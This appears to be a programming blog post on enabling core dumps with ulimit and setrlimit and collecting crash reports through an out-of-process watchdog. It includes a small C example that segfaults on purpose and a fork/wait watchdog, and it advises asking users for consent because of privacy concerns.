If you’re just poking around in the shell, you can enable core dumps with ulimit(1) to raise the core dump file size limit from 0 (the default) to something non-zero such as unlimited. This will cause any crashing programs spawned by that shell to leave core dumps. For example:

$ cat crash.c
int main(void)
{
    *(int *)1 = 2;  // cause a segfault
}
$ gcc crash.c -o crash
$ ./crash
Segmentation fault
$ ulimit -c unlimited
$ ./crash
Segmentation fault (core dumped)

Where the core dump ends up depends on your operating system. By default, Linux puts it in a file named core in the current working directory, and Mac OS X puts it in a file named /cores/core., where is the process ID of the process that crashed. The exact name and location may vary by flavor and version of OS. See the core(5) man page for detailed discussion of core files on Linux.

Ok, so that’s all well and good if someone has the good nature to run ulimit before running your program, but few (if any) people will do so. If you want to say, “No really, I want core dumps!, you can call setrlimit(2) to set the limit for yourself and any child processes (which is all ulimit really does). Just make sure not to annoy your users by filling up their hard drives with core dumps. Which of course you won’t do because your code is perfect and never crashes anyways.

You’ve gone through the trouble of creating a core dump, but when your program crashes in some far away land, how do you actually get your hands on the core dump? You could ask your users to email it to you, but they’re not going to do that. They’re just going to complain on the Internet that your software sucks and that people shouldn’t use it. Some operating systems have a nice Crash Reporter or Error Reporting Service, but those send crash reports to first parties, something you might not want, and getting the crash data back to you is far from trivial.

One solution is to install your own error handlers in-process to catch things such as segfaults and instead of letting the operating system handle the error, you handle it yourself: you do your own stack trace, grab important data such as filenames, optionally pop up a UI asking the user if he wants to send an error report and for supplemental information, and sending the crash report your way. This is a lot of work, and it’s also dangerous: if your program has crashed, there’s no telling what state it’s in. Trying to do something like sending an email from a signal handler could easily fail — your heap might be corrupted, so you could crash again the moment you do something as mundane as try to allocated some memory. If you decide to go this route, a good place to start would be with signal(2)/sigaction(2) (*nix and OSX) or Structured Exception Handling (Windows).

A solution that I like better is out-of-process. Just let the process crash and dump core as before, but this time we’ll have a watchdog process running. The watchdog just waits for the main process to exit (normally or abnormally); if it sees an abnormal exit and a core dump, then it sends off the crash report into the ether. This is much safer, since you don’t have to worry about things such as a corrupted heap when sending a crash report. The only downside to this you now have twice as many processes running.

Here’s a full example of a watchdog with core dumps. The program forks, with the parent as the watchdog. The child intentionally crashes, and then the parent grabs the core dump if one was made.

#include 
#include 
#include 
#include 
#include 

int main(int argc, char **argv)
{
  // Try to enable core dumps
  struct rlimit core_limit;
  core_limit.rlim_cur = RLIM_INFINITY;
  core_limit.rlim_max = RLIM_INFINITY;
  
  if(setrlimit(RLIMIT_CORE, &core_limit) < 0)
    fprintf(stderr, "setrlimit: %s\nWarning: core dumps may be truncated or non-existant\n", strerror(errno));


  int status;
  switch(fork())
  {
  case 0:
    // We are the child process -- run the actual program
    *(int *)1 = 2;  // segfault
    break;

  case -1:
    // An error occurred, shouldn't happen
    perror("fork");
    return -1;

  default:
    // We are the parent process -- wait for the child process to exit
    if(wait(&status) < 0)
      perror("wait");
    printf("child exited with status %d\n", status);
    if(WIFSIGNALED(status) && WCOREDUMP(status))
    {
      printf("got a core dump\n");
      // find core dump, email it to your servers, etc.
    }
  }
  
  return 0;
}

If you compile and run this program, you’ll get a core dump from the child process, which the parent process will detect, and it can then do whatever it wants with it. Email it to you, upload it to a server, analyze it and trim it down before doing those, or anything else you can write code to do. All from the safety of an uncrashed process. If you run ulimit -c 0 before running this program, you’ll see the warning about setrlimit failing and you won’t get a core dump. This is because, if you look at the documentation for setrlimit, you’ll see that the soft limit can never exceed the hard limit, and the hard limit can only be decreased by unprivileged processes.

So there you have it. You now have a way to have your software dump core when it crashes and send those core dumps back to you without any extra hassle on the user’s part. Though depending on who your users are, it may still be a good idea to ask them if they want to send a crash report before actually doing so, since core dumps can easily contain private information in them. If you had anything like usernames or passwords in memory anywhere in your process, they’ll be in the core dump. So keep that in mind and take appropriate measures to protect users’ privacy. Encrypt the core dump if necessary. Maybe even attach a cryptographic signature to ensure authenticity.

Links for further enrichment:

Mac OS X debugging magic, lots of great debug-fu for Mag OS X
XCrashReport (part 2) (part 3) (part 4), a nifty in-process crash reporter for Windows
And for your amusement: Kill -9 Bill